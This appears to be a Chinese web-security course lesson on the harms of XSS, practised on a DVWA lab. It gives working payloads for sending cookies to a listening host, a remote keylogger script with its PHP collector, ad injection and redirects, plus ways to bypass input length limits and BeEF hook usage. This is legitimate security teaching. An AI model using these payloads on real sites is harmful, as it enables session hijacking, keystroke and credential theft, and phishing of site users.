You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

214 lines
12 KiB
Markdown

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

# 22XSS跨站脚本攻击的危害性
你好,我是王昊天。
在上一节课程中我们学习了什么是XSS攻击并且介绍了XSS攻击的不同种类。在攻击示例的代码中我们仅仅是让网页弹出一个警告框看上去XSS攻击并没有什么作用但实际上它的危害性是比较大的。你会好奇XSS攻击会造成哪些危害吗
这节课,让我们一起来深入了解一下。
## XSS攻击的危害
XSS攻击的危害主要包括四种类型我已经将它们整理在下图中它们分别是盗取cookie、按键记录和钓鱼、广告植入以及欺骗跳转。
![图片](https://static001.geekbang.org/resource/image/79/28/7947771b79fb81ebdd8309d45e58a028.jpg?wh=856x412)
首先我们来学习具有代表性的XSS攻击利用盗取cookie看看攻击者是如何用XSS攻击实现对cookie的窃取。
### 盗取cookie
cookie在英文中的意思为甜品、饼干不过这里盗取cookie可不是偷饼干的意思哦。在HTTP请求中cookie代表着登录信息我们在Web应用登录成功后服务器端会生成一个cookie。然后服务器端会将这个生成的cookie发送给我们供我们之后访问的时候使用。
如果攻击者拿到cookie信息了那他就可以实现登录我们的账号这是非常危险的所以我们平时需要保护好我们的cookie信息。
在了解完cookie是什么之后让我们用一个示例一起看看XSS攻击是如何获得cookie信息的。
**这是一个DVWA靶场**我们在登陆后选择DOM型XSS获得如下页面
![图片](https://static001.geekbang.org/resource/image/c6/c4/c6052d10acaea8a2yye19daa008b45c4.png?wh=1904x1152)
在上一讲的实战部分中我们成功的对这个页面进行了XSS注入攻击其中使用的payload为
```javascript
<script>alert(1)</script>
```
在之前的学习中我们知道它可以让页面弹出一个警告框但如果我们将这个payload改为如下
```javascript
<script>var pic=document.createElement("img");pic.src="http://127.0.0.1:2222/getCookie?"+escape(document.cookie)</script>
```
这个payload会调用JavaScript创建一个Element对象之后将这个对象的src设置为我们监听的地址端口向这个地址用GET方式上传参数document.cookie这样我们就能窃取到用户的cookie啦。
![图片](https://static001.geekbang.org/resource/image/ba/ed/bab93ee93711yy226d1896e3c2e257ed.png?wh=1214x544)
可以看到,**我们已经收到这个GET请求了它的cookie值也被我们接收到了**。
到这里你已经学习了用XSS攻击来盗取cookie的用法。接下来让我们来学习如何用XSS攻击实现按键记录以及钓鱼。
### 按键记录和钓鱼
首先我们来看看如何实现按键记录。
我们仍然选择DVWA的XSS(DOM)靶场做测试只需要更换payload即可将payload设置为
```javascript
<script src=http://192.168.3.193/keylogger.js></script>
```
这段代码可以去调用远程地址中的JavaScript文件使得keylogger.js中的代码被执行。这里的keylogger.js的内容为
```javascript
document.onkeypress = function(evt) {
evt = evt || window.event;
key = String.fromCharCode(evt.charCode);
if(key) {
var http = new XMLHttpRequest();
var param = encodeURI(key);
http.open("POST","http://192.168.3.193/keylogger.php",true);
http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http.send("key="+param);
}
}
```
它创建了一个监听按键的事件这个事件可以记录用户在当前页面按下的每一个键并将接收到的按键通过POST方式上传到攻击者用来存储按键记录的服务器上。其中keylogger.php的代码为
```php
<?php
$key=$_POST['key'];
$logfile="keylog.txt";
$fp = fopen($logfile,"a");
fwrite($fp,$key);
fclose($fp);
?>
```
它可以将接收到的key记录到keylog.txt文件中**这样就能实现按键记录的功能了**。
我们胡乱的在被攻击的页面按下一些键发现我们用来记录按键的服务器已经获取到了按键内容并将它们存储在keylog.txt中。
![](https://static001.geekbang.org/resource/image/07/a0/07b42f2ce349e258f7390b6861760fa0.png?wh=1145x259)
我们还可以将这个按键记录做一下加工使得用户可以输入一些敏感信息例如账号、密码等信息。我们可以用JavaScript创建出一个伪造的登陆框这样用户很可能会上当在这里输入自己的用户名和密码我们可以利用之前的按键记录获取到这些信息。**这种行为就是钓鱼攻击**,因为它本质上和钓鱼非常类似,在钓鱼中我们就会利用鱼饵,将锋利的鱼钩伪装成美味的食物,这样就能骗得鱼儿上钩。
相信到这里你已经明白了如何用XSS攻击来实现按键记录以及钓鱼。接下来让我们学习用XSS实现广告植入的方式吧。
### 广告植入
想要做广告植入那我们需要用存储型XSS注入这样就可以使得所有访问受攻击页面的用户都会看到广告。
这里我们选择用DVWA的存储型XSS作为示例如下图这里需要输入一个姓名和消息。
![图片](https://static001.geekbang.org/resource/image/5c/78/5cfbd6580574dc0b4b41acb9471a8278.png?wh=904x289)
经过测试后我们发现这个Message框内会受到XSS攻击于是直接可以将负载改为
```javascript
<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='1000' height='2000' allowTransparency src=https://time.geekbang.org/course/detail/100055001-283034></iframe>");</script>
```
这段恶意负载可以在当前页面以行的方式输出src对应的内容这样我们把广告的地址设置为src即可。可以看到广告已经弹出这就是用XSS实现广告植入的方法。
在测试的过程中你可能会发现我们无法输入完整的负载这是因为DVWA对这个输入框有长度限制**我们有两种方法可以绕过这一输入限制**。
第一种我们先随意输入符合长度要求的Message内容之后用BurpSuite去进行拦截修改将Message的内容修改为我们想要设置的恶意负载这样就可以绕过输入长度限制。
第二种我们可以去修改页面的限制代码首先在Message输入框内右键选择检查这样关于它的代码就会高亮显示。
![图片](https://static001.geekbang.org/resource/image/14/d0/1430dd813988235a286733b058422ed0.png?wh=784x220)
在图中我们可以看到它限制了最多输入50个字符我们可以将这个数字改为1000或者更大来满足我们对负载长度的要求。修改过后我们就可以任意输入想要的负载啦。这里也是在前端进行的修改。
![图片](https://static001.geekbang.org/resource/image/60/81/605dcc52caa1ca45a6651cc185470081.png?wh=1269x686)
下面让我们继续学习XSS的危害类型看看如何用XSS去实现欺骗跳转。
### 欺骗跳转
有的网页希望增加访问量或者吸引用户访问那么就可能会用XSS攻击来实现这一目的。下面我们继续以DVWA靶场中的存储型XSS作为示例。
为了实现欺骗跳转,我们需要将负载设置为:
```javascript
<script>window.location.href=跳转的目的地址;</script>
```
这段负载也是JavaScript代码它可以使得当前页面跳转到设置的目的地址这就是跳转产生的原因。注意这里同样是需要绕过输入长度的限制的哦。
这样,当我们访问被攻击的页面时,页面会自动跳转到攻击者设置的地址中,如果攻击者将这个地址伪造为被攻击的页面,那么很容易迷惑访问用户,使得用户认为这就是被攻击的页面,**但事实上,用户已经落入到攻击者的圈套之中了。**
这就是用XSS实现欺骗跳转的方法。到这里你已经学完了常见的XSS攻击利用方法事实上这就是一个任意JavaScript命令执行漏洞我们只要更换不同的JavaScript语句就可以实现这些攻击行为。
上述内容都是我们对XSS攻击的手动利用接下来让我们来学习一款XSS攻击自动利用神器——BeEF。
## BeEF的使用
我们都知道Beef是牛肉的意思这款名为BeEF的软件也是非常牛的。**我们利用它可以进行各种各样的攻击操作,并且不需要我们手动进行一些负载的设计**,下面让我们一起来学习它吧。
首先我们要来安装这款软件我们可以在kali虚拟机中使用 `sudo apt install beef-xss` 进行BeEF的安装如果失败那么我们运行 `sudo apt-get update` 进行apt的更新然后重新安装即可。
安装完成之后,我们就可以用命令 `sudo beef-xss` 来打开这个软件可以看到它会自动弹出一个Web页面这就是这个软件的用户界面。
![图片](https://static001.geekbang.org/resource/image/24/f6/249dcae60e8805ba367d3a42674953f6.png?wh=1654x924)
我们选择DVWA的存储型XSS攻击来做测试让你可以更好地理解这款工具。
那么在利用BeEF前我们首先需要进行XSS攻击。
![图片](https://static001.geekbang.org/resource/image/49/0c/4925d7a0991769d15fef32429f627d0c.png?wh=1886x676)
和之前我们手动攻击一样需要在Message框内输入恶意负载由于我们BeEF工具所在的服务器地址为192.168.3.101,所以我们将负载设置为:
```javascript
<script src="http://192.168.3.101:3000/hook.js"></script>
```
这样每当这个页面被访问时都会触发我们注入的JavaScript代码使得页面向我们的恶意服务器请求hook.js文件其中你可以简单认为hook.js文件是BeEF的一个接口之后我们在BeEF调用的命令都是通过这个接口来实现的。
完成了接口的设置之后我们在BeEF的页面可以看到BeEF中的Hooked Browsers一栏已经显示出被攻击的目标。
![图片](https://static001.geekbang.org/resource/image/4c/a0/4c7c510c44a307501e38c531c7754ea0.png?wh=618x286)
这里192.168.3.124是我搭建的DVWA靶场的地址代表的是被攻击服务器IP而192.168.3.102代表的是访问被攻击服务器的用户机器的IP。我们点击Current Browser就可以进行我们想要的攻击行为啦。
![图片](https://static001.geekbang.org/resource/image/yy/07/yy627d5fc5043a1bb1c872c62cb4aa07.png?wh=1715x803)
首先我们选中Commands这一栏然后根据描述选择其中我们想要发起的攻击行为例如GET Cookie。
![图片](https://static001.geekbang.org/resource/image/f8/88/f80162yy5bbdyy945c8cb34e9c678588.png?wh=1745x869)
可以看到我们已经获取到了cookie信息。**这比我们手动去获取cookie简单很多。**
这就是BeEF的用法介绍当然它具有很多有趣的攻击功能下面我再介绍它的一个功能那就是改变页面内容。
![图片](https://static001.geekbang.org/resource/image/cb/53/cb1c8d8d6acd8db3257fbfaaa1e40853.png?wh=1692x599)
我们可以在Deface Content中对内容进行设置然后点击执行按钮可以发现我们的DVWA靶场已经变为了刚刚设计的内容。
![图片](https://static001.geekbang.org/resource/image/a9/6c/a90ddb4fe7bcb4b944ec8336b3d4ce6c.png?wh=1196x669)
其实BeEF的非常强大它具有几百个不同的攻击命令你可以一一尝试去把玩它们。
## 总结
在这节课程中我们可以感受到XSS攻击的可怕之处并且清楚了它的危害性。
首先我们学习了对XSS攻击的手动利用包括了盗取cookie、按键记录和钓鱼、广告植入以及欺骗跳转这些不同的攻击手段。但事实上我们都是利用的JavaScript代码注入页面中一切JavaScript代码可以实现的功能我们都能实现。所以实现XSS攻击的能力和JavaScript的掌握程度息息相关。
然后我们学习了XSS攻击神器——BeEF利用它我们不需要再亲自构造JavaScript代码而是利用设计好的代码直接发起我们想要的攻击行为这给我们带来了极大的便利。
## 思考题
除了这节课中提到的XSS攻击种类你还能想到别的攻击种类吗
欢迎在评论区留下你的思考。如果觉得今天的内容对你有所帮助的话,也欢迎你把课程分享给其他同事或朋友,我们共同学习进步!